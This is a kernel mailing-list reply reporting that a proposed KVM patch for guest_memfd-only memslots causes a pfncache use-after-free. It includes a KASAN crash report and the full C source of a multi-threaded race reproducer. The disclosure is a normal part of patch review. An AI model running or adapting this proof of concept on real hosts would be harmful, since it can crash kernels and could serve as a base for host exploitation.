Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots

From: XIAO WU

Date: Sat Jun 20 2026 - 20:03:13 EST


Hi

I came across the Sashiko review in this thread and wanted to see if
the pfncache UAF could be triggered in practice.  The short answer is:
yes, it reproduces reliably with a multi-threaded PoC.  Below is the
KASAN report and a brief description of the reproducer.

On Mon, Jun 15, 2026 at 04:52:44PM +0100, Alexandru Elisei wrote:
> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> memory provider for the virtual machine is the guest_memfd file, not the
> userspace mapping.
...
> @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>              unsigned long hva_start, hva_end;
>
>              slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> +
> +            if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> +                continue;
> +

This `continue` is the problem.  When the only memslot covering the
HVA range is gmem-only, found_memslot stays false, and in
invalidate_range_end, kvm_mmu_invalidate_end() is never called.
That means mmu_invalidate_seq never increments.

Meanwhile, the pfncache (used for guest pvclock) runs this retry
protocol in hva_to_pfn_retry():

    1. Capture mmu_seq
    2. Drop gpc->lock
    3. GUP + kmap (gets a page reference, creates kernel mapping)
    4. kvm_release_page_clean(page) — drops the reference
    5. Re-acquire gpc->lock
    6. mmu_notifier_retry_cache() — checks if mmu_seq changed

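If step 6 sees the same seq, the pfncache keeps the kernel mapping from
step 3 even though the page reference was dropped in step 4 and the page
may since have been freed.  Any later access through that stale mapping
is the UAF.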

[Reproduction]

I rebuilt the kernel with CONFIG_KASAN=y and ran the PoC in a QEMU VM.
The trigger is three threads racing concurrently:

  - Thread 1 (T0): hammers KVM_RUN ioctls, forcing
    kvm_guest_time_update → kvm_gpc_refresh → hva_to_pfn_retry
  - Thread 2 (T1): cycles KVM_SET_MSRS to activate/deactivate the
    pvclock pfncache, extending the race window
  - Thread 3 (T2): hammers MADV_DONTNEED + write on the HVA, firing
    MMU notifier invalidations while the memslot is gmem-only

The full PoC source (poc.c) is included inline at the end of this mail.
Compiled with: gcc -o poc poc.c -static -lpthread

[KASAN report — kernel 7.1.0-g0eb81d7f81ae #1, CONFIG_KASAN=y]

  ==================================================================
  BUG: KASAN: use-after-free in kvm_setup_guest_pvclock+0x632/0x680
  Read of size 4 at addr ffff888116069000 by task poc/9520

  CPU: 1 UID: 0 PID: 9520 Comm: poc Not tainted 7.1.0-g0eb81d7f81ae #1

  Call Trace:
   <TASK>
   dump_stack_lvl+0x116/0x1f0
   print_report+0xf4/0x600
   kasan_report+0xe0/0x110
   kvm_setup_guest_pvclock+0x632/0x680
   kvm_guest_time_update+0x741/0x1090
   vcpu_run+0x1c2a/0x5a80
   kvm_arch_vcpu_ioctl_run+0x1029/0x18d0
   kvm_vcpu_ioctl+0x772/0x1710
   __x64_sys_ioctl+0x193/0x210           ← KVM_RUN
   do_syscall_64+0x129/0x880
   entry_SYSCALL_64_after_hwframe+0x77/0x7f

  The buggy address belongs to the physical page:
  page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x7ff24ab46

  page last allocated via:
   get_user_pages_unlocked → hva_to_pfn → __kvm_gpc_refresh
     → kvm_gpc_refresh → kvm_setup_guest_pvclock

  page last free pid 9520 tgid 9517 stack trace:
   kvm_release_page_clean → __folio_put → __free_frozen_pages
     ← __kvm_gpc_refresh ← kvm_gpc_refresh

The allocation and free traces confirm the exact scenario from the
review: the page is allocated by GUP during gpc refresh, then freed by
kvm_release_page_clean() inside the same __kvm_gpc_refresh() call,
and then kvm_setup_guest_pvclock still accesses it through the stale
kmap.

The crash reproduces within ~40 seconds of the PoC running.

[Full PoC source]

Compile: gcc -o poc poc.c -static -lpthread

// SPDX-License-Identifier: GPL-2.0-only
/*
 * PoC for: KVM MMU notifier skip regression for guest_memfd-only memslots
 *
 * Concurrent threads create a race between gpc refresh (GUP → kmap →
 * kvm_release_page_clean → retry check) and MMU invalidation
 * (MADV_DONTNEED followed by a write to the same HVA) on a gmem-only
 * memslot where the invalidation doesn't increment mmu_invalidate_seq.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/kvm.h>

/*
 * Fallback definitions, used only when the included headers do not
 * already provide these names.
 * NOTE(review): presumably for building against older UAPI headers;
 * verify the numeric values against the target kernel's <linux/kvm.h>.
 */

/* NOTE(review): not referenced by the code visible in this file. */
#ifndef KVM_CAP_GUEST_MEMFD
#define KVM_CAP_GUEST_MEMFD 234
#endif
/* Flag passed in kvm_create_guest_memfd.flags when creating the guest_memfd. */
#ifndef GUEST_MEMFD_FLAG_MMAP
#define GUEST_MEMFD_FLAG_MMAP (1ULL << 0)
#endif
/* MSR index written through KVM_SET_MSRS by main() and by worker tid 1. */
#ifndef MSR_KVM_SYSTEM_TIME_NEW
#define MSR_KVM_SYSTEM_TIME_NEW 0x4b564d01
#endif

/*
 * Size used for the guest_memfd, the anonymous mapping, the memslot and
 * the madvise() range.  Assumes 4 KiB pages — TODO confirm on the target.
 */
#define PAGE_SIZE 4096

/*
 * State shared between main(), the signal handler and the worker threads.
 *
 * stop       - set to true to ask every worker loop to exit.  It is written
 *              from the signal handler and from main() and polled by all
 *              workers, so it is an atomic flag: volatile alone does not
 *              make concurrent access from several threads well-defined.
 * vcpu_fd    - vCPU file descriptor; assigned once in main() before the
 *              workers are started, -1 until then.
 * shared_hva - userspace address of the anonymous page backing the
 *              memslot; assigned once in main(), 0 until then.
 */
static atomic_bool stop = false;
static int vcpu_fd = -1;
static unsigned long shared_hva = 0;

/*
 * Signal handler (main() installs it for SIGINT and SIGTERM): request
 * shutdown by raising the stop flag.  The signal number is not needed.
 */
static void sigint_handler(int sig)
{
    (void)sig;
    stop = true;
}

static void *worker_thread(void *arg)
{
    int tid = (int)(long)arg;
    for (int i = 0; !stop && i < 200000; i++) {
        if (tid == 0)
            ioctl(vcpu_fd, KVM_RUN, 0);
        else if (tid == 1) {
            struct kvm_msrs *msrs = malloc(sizeof(*msrs) + sizeof(msrs->entries[0]));
            if (msrs) {
                memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
                msrs->nmsrs = 1;
                msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
                msrs->entries[0].data = (i & 1) ? 0x1001 : 0x1000;
                ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
                free(msrs);
            }
        } else {
            madvise((void*)shared_hva, PAGE_SIZE, MADV_DONTNEED);
            *(volatile char*)shared_hva = 0x42;
        }
        if (i % 50000 == 0)
            printf("[T%d] %d iterations\n", tid, i);
    }
    printf("[T%d] Done\n", tid);
    return NULL;
}

int main(void)
{
    signal(SIGINT, sigint_handler);
    signal(SIGTERM, sigint_handler);

    int kvm_fd = open("/dev/kvm", O_RDWR);
    int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);

    struct kvm_create_guest_memfd gmem_cmd = { .size = PAGE_SIZE, .flags = GUEST_MEMFD_FLAG_MMAP };
    int gmem_fd = ioctl(vm_fd, KVM_CREATE_GUEST_MEMFD, &gmem_cmd);

    void *anon = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE,
                      MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
    memset(anon, 0xAA, PAGE_SIZE);
    shared_hva = (unsigned long)anon;

    struct kvm_userspace_memory_region2 mem = {
        .slot = 0, .flags = KVM_MEM_GUEST_MEMFD,
        .guest_phys_addr = 0x1000, .memory_size = PAGE_SIZE,
        .userspace_addr = shared_hva,
        .guest_memfd_offset = 0, .guest_memfd = gmem_fd,
    };
    ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION2, &mem);

    vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
    size_t mmap_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
    struct kvm_run *vcpu_run = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE,
                                    MAP_SHARED, vcpu_fd, 0);

    /* Pre-activate pfncache via MSR */
    struct kvm_msrs *msrs = malloc(sizeof(*msrs) + sizeof(msrs->entries[0]));
    memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
    msrs->nmsrs = 1;
    msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
    msrs->entries[0].data = 0x1001;
    ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
    free(msrs);

    pthread_t threads[3];
    for (int i = 0; i < 3; i++)
        pthread_create(&threads[i], NULL, worker_thread, (void *)(long)i);

    sleep(40);
    stop = true;
    for (int i = 0; i < 3; i++)
        pthread_join(threads[i], NULL);

    printf("[*] Done. Check dmesg for KASAN UAF.\n");
    return 0;
}

Thanks,
XIAOWU